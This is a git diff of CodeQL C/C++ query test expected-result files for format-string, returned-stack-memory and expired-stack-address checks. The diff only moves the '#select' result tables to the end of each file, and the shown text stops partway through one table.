@@ -1,23 +1,3 @@ -#select -| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | -| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | -| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | -| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | -| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | -| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | -| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | -| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | -| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | -| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | -| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | -| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:206:5:206:10 | call to printf | printf | -| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| test.cpp:211:5:211:10 | call to printf | printf | -| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | -| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | -| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | -| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | -| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | -| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | edges | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | provenance | | | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | provenance | DataFlowFunction | 
@@ -118,3 +98,23 @@ nodes | test.cpp:247:12:247:16 | *hello | semmle.label | *hello | subpaths | test.cpp:195:31:195:33 | *str | test.cpp:179:6:179:21 | [summary param] *2 in StringCchPrintfW | test.cpp:179:6:179:21 | [summary param] *0 in StringCchPrintfW [Return] | test.cpp:195:20:195:23 | StringCchPrintfW output argument | +#select +| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | +| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | +| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | +| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | +| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | +| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | +| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | +| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | +| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | +| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | +| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | +| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| test.cpp:206:5:206:10 | call to printf | printf | +| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:211:5:211:10 | call to printf | printf | +| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | +| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | +| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | +| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | +| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | +| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected index f53047761409..6aa457b1e8a4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected 
@@ -1,20 +1,3 @@ -#select -| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | -| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | -| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | -| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | -| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | -| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | -| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | -| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | -| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. | test.cpp:134:8:134:10 | arr | arr | -| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | -| test.cpp:177:10:177:23 | Convert: (void *)... 
| test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | -| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | -| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | -| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | -| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | -| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | edges | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | | test.cpp:23:17:23:19 | & ... | test.cpp:23:17:23:19 | & ... | 
@@ -131,3 +114,20 @@ nodes | test.cpp:249:13:249:20 | call to strndupa | semmle.label | call to strndupa | | test.cpp:250:9:250:10 | (void *)... | semmle.label | (void *)... | | test.cpp:250:9:250:10 | s2 | semmle.label | s2 | +#select +| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | +| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | +| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | +| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | +| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | +| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | +| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | +| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | +| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. 
| test.cpp:134:8:134:10 | arr | arr | +| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | +| test.cpp:177:10:177:23 | Convert: (void *)... | test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | +| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | +| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | +| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | +| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | +| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected index bf50722ec86b..858dbea59321 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected 
@@ -1,31 +1,3 @@ -#select -| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | -| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | -| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | -| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | -| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... | test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | -| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... 
| test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | -| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | -| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | -| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... | test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | -| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... 
| test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | -| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | -| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | -| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | -| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | -| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... | test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | -| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... 
| test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | -| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | -| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | -| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | -| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | -| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | edges | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:14:3:14:9 | Call: call to escape1 | | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:19:3:19:9 | Call: call to escape1 | 
@@ -96,3 +68,31 @@ edges | test.cpp:238:3:238:9 | Call: call to escape2 | test.cpp:239:17:239:17 | Load: p | | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:267:3:267:9 | Call: call to escape3 | | test.cpp:267:3:267:9 | Call: call to escape3 | test.cpp:268:17:268:17 | Load: p | +#select +| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | +| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | +| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | +| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | +| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... 
| test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | +| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... | test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | +| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | +| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | +| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | 